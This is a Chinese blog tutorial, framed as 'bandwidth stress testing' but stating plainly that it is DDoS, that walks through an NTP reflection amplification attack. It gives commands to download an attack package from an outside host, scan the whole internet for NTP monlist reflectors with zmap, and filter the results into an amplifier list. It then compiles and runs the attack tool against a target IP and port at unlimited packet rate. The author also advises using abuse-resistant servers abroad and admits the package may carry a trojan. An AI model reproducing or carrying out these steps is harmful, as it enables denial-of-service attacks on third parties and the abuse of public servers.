如何利用大带宽服务器进行测压

  1. 就是 ddos 啦,请勿违法行为!本人不承担任何法律责任
  2. 请使用抗投诉服务器,切勿使用国内服务器
  3. 本人不贩卖Ddos系统,也不会参与。

教程开始

  • 系统环境为CentOS7 先 sudo su 给权限
sudo su
  • 首先yum update后安装依赖
yum install epel-release -y
yum install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c zmap screen -y
  • 然后下载 wget
yum install -y wget
  • 然后下载压缩包
wget http://pan.azhai.de/down.php/1e6b02036dedf65231c0e0f7ac31c73f.zip
  • 然后默认在/root 下解压
unzip D.zip

解压失败的话就执行下方命令

yum install -y unzip
  • 打开一个screen并使用zmap进行扫描
screen zmap -p 123 -M udp --probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt
  • 如果提示错误需要指定网卡,加一个-i 网卡名称,例如
screen zmap -i p2p1 -p 123 -M udp --probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt

 然后就是漫长的等待,测试服务器使用500M带宽,扫描全网花了6个小时

 扫出结果后,我们需要检查下列表内的IP哪些可以使用反射

  • 给压缩包内的ntpchecker 777权限
chmod 777 ntpchecker
  • 进行检查
./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1

 这个步骤应该10分钟就OK了,具体取决于机器性能和网络速率,怕掉线的话可以开个screen保持
 检查完成后,进行格式化

awk '$2>419{print $1}' step1.txt | sort -n | uniq | sort -R > ntpamp.txt

这样我们就得到了一份可以用来进行使用的NTP列表了

  • 压缩包内已经有了攻击程序,可以直接使用编译压缩包内的攻击程序
gcc -lpthread ntp.c -lpcap -o ntp

 到此就完成了

  • 使用命令举例
./ntp 127.0.0.1 80 ntpamp.txt 1000 -1 100
  • 参数解释
127.0.0.1=目标IP
80=攻击端口
ntpamp.txt=过滤后的放大列表
1500=线程
-1=pps限制,-1表示无限制
100=攻击时间

请合理利用,请勿适用于非法用途

注意事项

  1. 再次提醒请不要使用国内服务器
  2. 脚本可能存在木马程序,扫描以后建议保存数据,然后重装系统
  3. 扫描需要消耗大量资源,提示了解服务器是否支持,否则可能会被封机
  4. 请勿使用本教程进行违法行为!

    © 版权声明
    THE END
    支持博主,更新加速
    点赞1赞赏 分享
    勋章统计

    评论一下 抢沙发

    请登录后发表评论

      请登录后查看评论内容